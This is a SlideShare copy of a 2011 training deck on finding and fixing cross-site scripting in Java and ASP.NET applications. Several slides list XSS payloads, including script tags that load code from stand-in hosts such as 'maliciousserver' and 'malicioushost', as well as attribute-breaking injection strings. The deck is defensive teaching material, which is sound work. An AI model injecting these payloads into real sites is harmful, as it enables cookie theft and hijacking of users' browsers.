SlideShare una empresa de Scribd logo

XSS Remediation

Denim Group
Denim Group

This document discusses cross-site scripting (XSS) vulnerabilities and remediation. It begins with an introduction to XSS and examples of reflected and stored XSS. It then covers crafting XSS payloads and the impact of successful attacks. The document concludes with recommendations for mitigation, including input validation, output encoding, and tools like OWASP ESAPI and the Microsoft Web Protection Library.

Tecnología
1 de 34
Descargar para leer sin conexión
Cross-Site Scripting (XSS) Remediation Guerilla Training Camp Security BSides Austin Dan Cornell © Copyright 2011 Denim Group - All Rights Reserved
My Background • Dan Cornell, founder and CTO of Denim Group • Software developer by background (Java, .NET, etc) • OWASP San Antonio, Global Membership Committee • Denim Group – Build software with special security, performance, reliability requirements – Help organizations deal with the risk associated with their software • Code reviews and application assessments • SDLC consulting • Secure development training – instructor-led and eLearning © Copyright 2011 Denim Group - All Rights Reserved 1
Agenda • What is Cross-Site Scripting (XSS)? • How Do You Remediate XSS Vulnerabilities? • Questions © Copyright 2011 Denim Group - All Rights Reserved 2
Vulnerability: Cross-Site Scripting #2 in the OWASP Top 10 If an attacker controls your browser – it is no longer your browser © Copyright 2011 Denim Group - All Rights Reserved 3
Let's look at a simple application Web Application Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker © Copyright 2011 Denim Group - All Rights Reserved 4
A standard user can update the name and email address on their profile: NormalGuy normalguy@normalmail.com An administrative user can retrieve this information, shown in a page: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value="normalguy@normalmail.com"> © Copyright 2011 Denim Group - All Rights Reserved 5
With normal input <input type=”text” name=”name” value=”NormalGuy”><br> <input type=”text” name=”email” value=” normalguy@normalmail.com”> Web Browser Administrative Pages Administrator Database Web Browser User Pages NormalGuy User normalguy@normalmail.com © Copyright 2011 Denim Group - All Rights Reserved 6
A malicious user can inject malicious scripts into their profile: MaliciousGuy "><script src="http://maliciousserver/rewritepage.js" /> When the administrative user retrieves this information: <input type="text" name="name" value="NormalGuy"><br> <input type="text" name="email" value=" "><script src="http://maliciousserver/rewritepage.js" />"> © Copyright 2011 Denim Group - All Rights Reserved 7
With malicious input <input type=”text” name=”name” value=”MaliciousGuy”><br> <input type=”text” name=”email” value=””><script src=”http://maliciousserver/rewritepage.js” />”> Web Browser Administrative Pages Administrator Database Web Browser User Pages Attacker MaliciousGuy ”><script src=”http://maliciousserver/rewritepage.js” /> © Copyright 2011 Denim Group - All Rights Reserved 8
What is Cross-Site Scripting? • Occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • Victim's browser renders HTML and executes JavaScript chosen by the Attacker • Not a direct attack on the application – it is attack on users of the application – Exploitation can involve many scenarios including social engineering • Most common web application security issue – Based on MITRE statistics © Copyright 2011 Denim Group - All Rights Reserved 9
Impact of Cross-Site Scripting What can an attacker accomplish with a malicious script? © Copyright 2011 Denim Group - All Rights Reserved 10
Cross-Site Scripting Attacks • Attackers may have different means to have their code to execute on another user’s browser • Reflected • Stored • DOM Based © Copyright 2011 Denim Group - All Rights Reserved 11
Reflected Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Web application reflects the payload back to the victim's browser where it is rendered and executed • Commonly found in – Login pages – Message pages © Copyright 2011 Denim Group - All Rights Reserved 12
Reflected Cross-Site Scripting Malicious Web Attacker User Web Application Server Send e-mail to user with link Link makes request to website Response includes malicious content Malicious content sends authentication information to attacker’s resources or Malicious content redirects user to malicious website © Copyright 2011 Denim Group - All Rights Reserved 13
Stored Cross-Site Scripting • Attacker posts payload to a database or other data store • Victim uses the same site and visits a page where the payload is sent back to the victim • The payload is rendered and executed in the browser • Commonly found in – Message boards (horizontal privilege escalation) – User management systems (vertical privilege escalation) © Copyright 2011 Denim Group - All Rights Reserved 14
Stored Cross-Site Scripting Attacker Web Application User Submit field with malicious content Request for content to approve Reply containing malicious content © Copyright 2011 Denim Group - All Rights Reserved 15
DOM-based Cross-Site Scripting • Attacker crafts a malicious link containing the payload • Attacker makes that link available for victims to click • Victim encounters malicious link and clicks • Client-side code parses user-supplied data to make decisions • Things to look for – document.URL – document.URLUnencoded – document.location (and its other properties) – Document.referrer – window.location (and its other properties) © Copyright 2011 Denim Group - All Rights Reserved 16
Crafting XSS Payloads • Most basic, if payload is echoed directly into open HTML – <script>alert('hi');</script> • Sometimes you may have to deal with application HTML – <input name='uname' value='<%= Request["uname"] %>' /> – uname parameter must: • Close out the value attribute: '> • Then include the payload: <script>alert('hi');</script> • Then clean up before the application HTML starts again: <' • Full payload: '><script>alert('hi');</script><' © Copyright 2011 Denim Group - All Rights Reserved 17
Crafting XSS Payloads Script with the 'src' attribute <SCRIPT SRC=http://malicioushost/maliciousscript.js></SCRIPT> An attacker is likely to use the 'src' attribute if the script requires more space than the application accommodates. Image <IMG SRC="javascript:alert('XSS');"> Body <BODY BACKGROUND="javascript:alert('XSS')"> © Copyright 2011 Denim Group - All Rights Reserved 18
Crafting XSS Payloads Input <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> Iframe <IFRAME SRC="javascript:alert('XSS');"></IFRAME> In addition, the iframe can point to a malicious page on a remote host. Table <TABLE BACKGROUND="javascript:alert('XSS')"> Div <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> © Copyright 2011 Denim Group - All Rights Reserved 19
Impact • Attacker can render HTML and execute script in the victim's browser, resulting in: – Session hijacking (adding JavaScript that forwards cookies to an attacker) – Misinformation (adding "For more info call 1-800-A-BAD-GUY" to a page) – Defacing web site (adding "This company is terrible!!!" to a page) – Inserting hostile content (adding malicious ActiveX controls to a page) – Phishing attacks (adding login FORM posts to 3rd party sites) – Takeover of the user's browser (adding JavaScript code to redirect the user) © Copyright 2011 Denim Group - All Rights Reserved 20
Mitigation • Positively validate inputs – Length, type, syntax, business rules • Encode application outputs – HTML or XML – < becomes &lt; and so on © Copyright 2011 Denim Group - All Rights Reserved 21
Java-specific Safeguards • Avoid using <%= %> because that does not encode outputs • Escape special HTML characters – < > ' " / & and so on… • Use URLEncoder class to encode characters being placed in a URL • Use Struts output mechanisms such as <bean:write …> • User JSTL escapeXML="true" attribute in <c:out …> • Use ESAPI Encoders © Copyright 2011 Denim Group - All Rights Reserved 22
.NET-specific Safeguards • .NET has built-in blacklist validation against many known XSS attacks – This is good, but not ideal – This can be turned off with ValidateRequest="false" in the Page tag (BAD!) • Validation framework offers many protection options – RegExValidator and others • Avoid using <%= %> because that does not encode outputs – Look at <%: %> syntax in ASP.NET 4 – http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html- encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx • Better: Use HttpUtility.HtmlEncode() to encode user-supplied data that is reflected back to users • Best: Microsoft Web Protection Library (WPL) – http://wpl.codeplex.com/ © Copyright 2011 Denim Group - All Rights Reserved 23
Cross-Site Scripting Recap • Cross-Site Scripting (XSS) occurs when an application takes data from a user and sends it back to a web browser without validation or encoding • There are three main varieties: – Stored – Reflected – DOM-based • To guard against: – Positively validate inputs – Escape user-supplied data sent back to the browser © Copyright 2011 Denim Group - All Rights Reserved 24
OWASP ESAPI • Sites: – Main: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API – Java: http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API#tab=Java_EE • Good: Provides very robust set of encoder functions • Less good: – Has a number of dependencies (~29) (currently – work on modularity is in progress) – Implementations are of varying maturity. Most useful for Java. © Copyright 2011 Denim Group - All Rights Reserved 25
OWASP ESAPI (Java) • To Use: – Follow the installation guide – Must create a folder (.esapi) to store your configuration and preferences • Get access to library: – Add all the support jars (31) to your project – Remove repeated jars – Add esapi-2.0_rc10.jar to your project <%@ page import="org.owasp.esapi.ESAPI, org.owasp.esapi.Encoder" %> • Make calls to encode tainted data: – ESAPI.encoder().encodeForHTML() – ESAPI.encoder().encodeForHTMLAttribute() © Copyright 2011 Denim Group - All Rights Reserved 26
ASP.NET Request Validation • ASP.NET provides some blacklist-based input validation to try and guard against HTML injection and cross-site scripting (XSS) attacks • This is turned on by default (yeah!) • Many applications disable it (boo!) – Blocked a valid request – Made trouble with AJAX – And so on © Copyright 2011 Denim Group - All Rights Reserved 27
ASP.NET Request Validation • How to configure or check if it is enabled? • This is turned on by default • In web.config: <configuration> <system.web> <pages validateRequest=“true|false" /> </system.web> </configuration> • Per-page: <%@ Page … ValidateRequest=“true|false" %> © Copyright 2011 Denim Group - All Rights Reserved 28
Microsoft Web Protection Library • Main site: – http://wpl.codeplex.com/ • To use: – Import reference to AntiXSS.dll (optionally include HtmlSanitizationLibrary.dll) • Found in C:Program Files (x86)Microsoft Information SecurityAntiXSS Library v4.0 – Get access to library: • In code: – using Microsoft.Security.Application; • In ASPX page: – <%@ Import Namespace="Microsoft.Security.Application" %> – Make call to encode tainted data: • AntiXss.HtmlEncode() • AntiXss.HtmlAttributeEncode() • And so on… © Copyright 2011 Denim Group - All Rights Reserved 29
Exercise: Fixing XSS Vulnerabilities • Java – Reflected XSS – Stored XSS • ASP.NET – Reflected XSS – Stored XSS © Copyright 2011 Denim Group - All Rights Reserved 30
But Your ASP.NET Examples Cheated! • This is true: ASP.NET provides some XSS protection via the ValidateRequest functionality • However: – This can be (and is often) turned off on a per-page or site-wide basis – It has been defeated in the past and will be defeated again in the future • http://www.procheckup.com/vulnerability_manager/documents/document_1258758664/byp assing-dot-NET-ValidateRequest.pdf • http://www.blackhat.com/presentations/bh-usa-09/VELANAVA/BHUSA09-VelaNava- FavoriteXSS-SLIDES.pdf • If you want your code to be “Rugged” then you need to actually guard against cross-site scripting vulnerabilities in your code © Copyright 2011 Denim Group - All Rights Reserved 31
Resources • OWASP ESAPI – http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API • Microsoft Web Protection Library – http://wpl.codeplex.com/ • Denim Group Remediation Resource Center – www.denimgroup.com/remediation © Copyright 2011 Denim Group - All Rights Reserved 32
Questions? Dan Cornell dan@denimgroup.com Twitter: @danielcornell www.denimgroup.com (210) 572-4400 © Copyright 2011 Denim Group - All Rights Reserved 33

Recomendados

Injection flaws
Injection flawsInjection flaws
Injection flaws
DANISH INAMDAR
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
Vishal Kumar
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
Sam Bowne
 
Cache poisoning
Cache poisoningCache poisoning
Cache poisoning
AlexandraLacatus
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
Ivan Novikov
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 

Recomendados

Injection flaws
Injection flawsInjection flaws
Injection flaws
DANISH INAMDAR
 
Owasp top 10 security threats
Owasp top 10 security threatsOwasp top 10 security threats
Owasp top 10 security threats
Vishal Kumar
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
Sam Bowne
 
Cache poisoning
Cache poisoningCache poisoning
Cache poisoning
AlexandraLacatus
 
Deep dive into ssrf
Deep dive into ssrfDeep dive into ssrf
Deep dive into ssrf
n|u - The Open Security Community
 
SSRF workshop
SSRF workshop SSRF workshop
SSRF workshop
Ivan Novikov
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
n|u - The Open Security Community
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
Ikhade Maro Igbape
 
Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
Daniel Tumser
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
Kapil Nagrale
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
Noppadol Songsakaew
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
Onwukike Chinedu. CISA, CEH, COBIT5 LI, CCNP
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
n|u - The Open Security Community
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
Albena Asenova-Belal
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
Michael Furman
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Adam Nurudini
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
Tony Bibbs
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
Aman Singh
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
Amit Tyagi
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration
Tariq Islam
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
Vishal Kumar
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
n|u - The Open Security Community
 
Web application security
Web application securityWeb application security
Web application security
Kapil Sharma
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
Vivek Sinha Anurag
 
Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
Denim Group
 
Web application security
Web application securityWeb application security
Web application security
Jin Castor
 

Más contenido relacionado

La actualidad más candente

OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
drewz lin
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
Marco Morana
 

La actualidad más candente (20)

Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)Cross-Site Scripting (XSS)
Cross-Site Scripting (XSS)
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...A2 - broken authentication and session management(OWASP thailand chapter Apri...
A2 - broken authentication and session management(OWASP thailand chapter Apri...
 
File upload vulnerabilities & mitigation
File upload vulnerabilities & mitigationFile upload vulnerabilities & mitigation
File upload vulnerabilities & mitigation
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflows
 
A8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentationA8 cross site request forgery (csrf) it 6873 presentation
A8 cross site request forgery (csrf) it 6873 presentation
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
Unrestricted file upload CWE-434 - Adam Nurudini (ISACA)
 
Introduction To OWASP
Introduction To OWASPIntroduction To OWASP
Introduction To OWASP
 
Cross Site Request Forgery
Cross Site Request ForgeryCross Site Request Forgery
Cross Site Request Forgery
 
Web Exploitation Security
Web Exploitation SecurityWeb Exploitation Security
Web Exploitation Security
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
A5: Security Misconfiguration
A5: Security Misconfiguration A5: Security Misconfiguration
A5: Security Misconfiguration
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 
Cross site scripting
Cross site scriptingCross site scripting
Cross site scripting
 
Web application security
Web application securityWeb application security
Web application security
 
Presentation on Web Attacks
Presentation on Web AttacksPresentation on Web Attacks
Presentation on Web Attacks
 

Similar a XSS Remediation

Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
Denim Group
 
Web application security
Web application securityWeb application security
Web application security
Jin Castor
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
Denim Group
 
גיא אילון Websense
גיא אילון Websenseגיא אילון Websense
גיא אילון Websense
lihig
 
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel SemeniukFy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
sim100
 
Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?
Denim Group
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Capgemini
 
Corona - Ph.D. Defense Slides
Corona - Ph.D. Defense SlidesCorona - Ph.D. Defense Slides
Corona - Ph.D. Defense Slides
Pluribus One
 
Benchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR OrganizationBenchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR Organization
Denim Group
 
Know Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web ServersKnow Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web Servers
webhostingguy
 
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App SecurityDon’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Sasha Nunke
 

Similar a XSS Remediation (20)

Smart Phones Dumb Apps
Smart Phones Dumb AppsSmart Phones Dumb Apps
Smart Phones Dumb Apps
 
Web application security
Web application securityWeb application security
Web application security
 
Security Testing Mobile Applications
Security Testing Mobile ApplicationsSecurity Testing Mobile Applications
Security Testing Mobile Applications
 
Do You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez MetulaDo You Write Secure Code? by Erez Metula
Do You Write Secure Code? by Erez Metula
 
גיא אילון Websense
גיא אילון Websenseגיא אילון Websense
גיא אילון Websense
 
How to Stop Man in the Browser Attacks
How to Stop Man in the Browser AttacksHow to Stop Man in the Browser Attacks
How to Stop Man in the Browser Attacks
 
Mobile Browser Content Handling
Mobile Browser Content HandlingMobile Browser Content Handling
Mobile Browser Content Handling
 
Security risks awareness
Security risks awarenessSecurity risks awareness
Security risks awareness
 
Web Application Vulnerabilities
Web Application VulnerabilitiesWeb Application Vulnerabilities
Web Application Vulnerabilities
 
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel SemeniukFy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
Fy09 Sask Tel Learn It Ie7 And Ie8 Joel Semeniuk
 
Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?Software Security for Project Managers: What Do You Need To Know?
Software Security for Project Managers: What Do You Need To Know?
 
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
Cross-Site Request Forgery Vulnerability: “A Sleeping Giant”
 
Jean pier talbot - web is the battlefield - atlseccon2011
Jean pier talbot - web is the battlefield - atlseccon2011Jean pier talbot - web is the battlefield - atlseccon2011
Jean pier talbot - web is the battlefield - atlseccon2011
 
A mit m
A mit mA mit m
A mit m
 
Web security 2012
Web security 2012Web security 2012
Web security 2012
 
Corona - Ph.D. Defense Slides
Corona - Ph.D. Defense SlidesCorona - Ph.D. Defense Slides
Corona - Ph.D. Defense Slides
 
Benchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR OrganizationBenchmarking Web Application Scanners for YOUR Organization
Benchmarking Web Application Scanners for YOUR Organization
 
Know Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web ServersKnow Your Enemy: Behind the Scenes of Malicious Web Servers
Know Your Enemy: Behind the Scenes of Malicious Web Servers
 
Web browser and Security Threats
Web browser and Security ThreatsWeb browser and Security Threats
Web browser and Security Threats
 
Don’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App SecurityDon’t let Your Website Spread Malware – a New Approach to Web App Security
Don’t let Your Website Spread Malware – a New Approach to Web App Security
 

Más de Denim Group

Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Denim Group
 
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at ScaleOptimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Denim Group
 
OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20
Denim Group
 
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA ProgramAppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
Denim Group
 
Using Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team SportUsing Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team Sport
Denim Group
 
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your OrganizationSecurity Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Denim Group
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
Denim Group
 
An Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT SystemsAn Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT Systems
Denim Group
 
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Denim Group
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital TransformationAppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
Denim Group
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
Denim Group
 
AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation AppSec in a World of Digital Transformation
AppSec in a World of Digital Transformation
Denim Group
 
Enumerating Enterprise Attack Surface
Enumerating Enterprise Attack SurfaceEnumerating Enterprise Attack Surface
Enumerating Enterprise Attack Surface
Denim Group
 

Más de Denim Group (20)

Long-term Impact of Log4J
Long-term Impact of Log4JLong-term Impact of Log4J
Long-term Impact of Log4J
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
Threat Modeling the CI/CD Pipeline to Improve Software Supply Chain Security ...
 
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at ScaleOptimizing Security Velocity in Your DevSecOps Pipeline at Scale
Optimizing Security Velocity in Your DevSecOps Pipeline at Scale
 
Application Asset Management with ThreadFix
Application Asset Management with ThreadFix Application Asset Management with ThreadFix
Application Asset Management with ThreadFix
 
OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20OWASP San Antonio Meeting 10/2/20
OWASP San Antonio Meeting 10/2/20
 
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA ProgramAppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
AppSec Fast and Slow: Your DevSecOps CI/CD Pipeline Isn’t an SSA Program
 
Using Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team SportUsing Collaboration to Make Application Vulnerability Management a Team Sport
Using Collaboration to Make Application Vulnerability Management a Team Sport
 
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
Managing Penetration Testing Programs and Vulnerability Time to Live with Thr...
 
Security Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your OrganizationSecurity Champions: Pushing Security Expertise to the Edges of Your Organization
Security Champions: Pushing Security Expertise to the Edges of Your Organization
 
The As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native ApplicationsThe As, Bs, and Four Cs of Testing Cloud-Native Applications
The As, Bs, and Four Cs of Testing Cloud-Native Applications
 
An Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT SystemsAn Updated Take: Threat Modeling for IoT Systems
An Updated Take: Threat Modeling for IoT Systems
 
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
Continuous Authority to Operate (ATO) with ThreadFix – Bringing Commercial In...
 
A New View of Your Application Security Program with Snyk and ThreadFix
A New View of Your Application Security Program with Snyk and ThreadFixA New View of Your Application Security Program with Snyk and ThreadFix
A New View of Your Application Security Program with Snyk and ThreadFix
 
Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...Enabling Developers in Your Application Security Program With Coverity and Th...
Enabling Developers in Your Application Security Program With Coverity and Th...
 
AppSec in a World of Digital Transformation
